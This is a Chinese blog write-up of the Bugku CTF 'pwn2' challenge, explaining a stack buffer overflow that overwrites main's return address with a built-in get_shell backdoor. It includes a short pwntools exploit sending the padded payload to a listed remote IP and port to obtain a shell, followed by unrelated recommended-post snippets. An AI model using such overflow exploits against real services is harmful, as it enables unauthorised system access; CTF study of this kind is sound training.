pwn2

题目

chmod +x pwn2


这里都关闭了,栈上可执行!


这个程序里面直接留了后门get_shell_

思路,输入的数据超过0x30栈空间大小,将get_shell_地址覆盖调用main函数的返回地址即可,
b'm' * (0x30 + 8) + p64(0x400751),这里加上8是因为push了rbp,即8个字节大小

exp

from pwn import *p = remote('114.116.54.89', '10003')
payload = b'a' * (0x30 + 8) + p64(0x400751)
p.recvuntil('say something')
p.sendline(payload)
p.interactive()

Bugku pwn2相关推荐

  1. [Bugku CTF——Pwn] pwn2

    [Bugku CTF--Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 explo ...

  2. [BUGKU] [PWN] PWN5

    [BUGKU] [PWN] PWN5 先下载文件,拉入UBUNTU,checksec检查一下 checksec human 架构是amd64,并开启了NX(堆栈可执行,16进制地址后六位不变,其余运行 ...

  3. php 伪协议 lfi,php://伪协议(I/O)总能给你惊喜——Bugku CTF-welcome to bugkuctf

    今天一大早BugkuCTF 的welcome to bugkuctf 就给了我一发暴击:完全不会啊...光看源码就发现不知道怎么处理了,于是转向writeup求助.结果发现这是一道非常有营养的题目,赶 ...

  4. BUGKU 密码题:这不是摩斯密码

    BUGKU 密码题:这不是摩斯密码 这不是摩斯密码 打开文件,发现如下符号: 可以发现,符号都是由> < + - . , [ ]来组成.那么显然,这个是Brainfuck加密.这里推荐一个 ...

  5. Bugku——Web——矛盾

    题目链接:http://ctf.bugku.com/challenges#矛盾:http://123.206.87.240:8002/get/index1.php 解题步骤: 1.is_numeric ...

  6. 输入密码查看flag(详解)——Bugku

    刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! Ch ...

  7. 点击一百万次(详解)——bugku

    刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! Ch ...

  8. bugku——web 做题记录

    Table of Contents 2,秋名山车神: 3,速度要快 4 welcome to the bugkuctf 1,login1(sql约束攻击) sql约束攻击: 2,过狗一句话 3,细心 ...

  9. bugku ——加密 做题记录

    目录 1,滴答-滴 2,聪明的小羊 3,ok 4这不是摩斯密码 5,easy_crypto 6,简单加密 7,散乱的密文 8 凯撒部长的奖励 9,一段base64 10,.!? 11,+[]-(Bra ...

最新文章

  1. jieba词性说明字典
  2. 统一代码段与非一致代码段
  3. pandas对象保存到mysql出错提示“BLOB/TEXT column used in key specification without a key length”解决办法
  4. pytorch Embedding模块,自动为文本加载预训练的embedding
  5. 大型web工程的session管理器构想
  6. docker_5 DockerFile
  7. 服务端如何防止订单重复支付?
  8. 分布式系统工具箱 Spring Cloud 概览
  9. Linux 用户的 3 个命令行小技巧
  10. 【回归预测】基于matlab Logistic混沌映射改进的麻雀搜索算法优化BP神经网络回归预测【含Matlab源码 1552期】
  11. Class字节码文件结构总结
  12. ANSYS12.0安装教程
  13. 基于librtmp的推流实现
  14. word论文排版和写作02:插入算法的伪代码
  15. 今日说“法”:FPGA芯片如何选型?
  16. python利用浏览器执行js_浏览器如何执行JS
  17. vue+springboot实现调用本地摄像头拍照上传后端使用百度ocr识别身份证信息
  18. 【To Be Continued】一些有意思的计算机小问题
  19. 台式计算机一小时功率,电脑电源功率如何选?电脑1小时能耗多少电?
  20. hadoop编程:分析CSDN注册邮箱分布情况

热门文章

  1. html中select标签默认选择,HTML中的select标签如何设置默认选中的选项
  2. oracle power 函数
  3. 嵌入式入门需要学什么
  4. linux修改文件名为gbk,Linux下文件名编码转换-Convmv
  5. 百度指数数据抓取Python+selenuim+OpenCV(三)
  6. 将Kali Linux 2020.1a 版本英文版改中文版的方法(直接安装中文版后乱码)
  7. mysql (errcode 2)_“File '/usr/share/mysql/charsets/?.conf' not found (Errcode: 2)”,出错急救!...
  8. Redis 主从搭建
  9. byte转int出现负数的情况
  10. TCP/ip实现客户端并发登录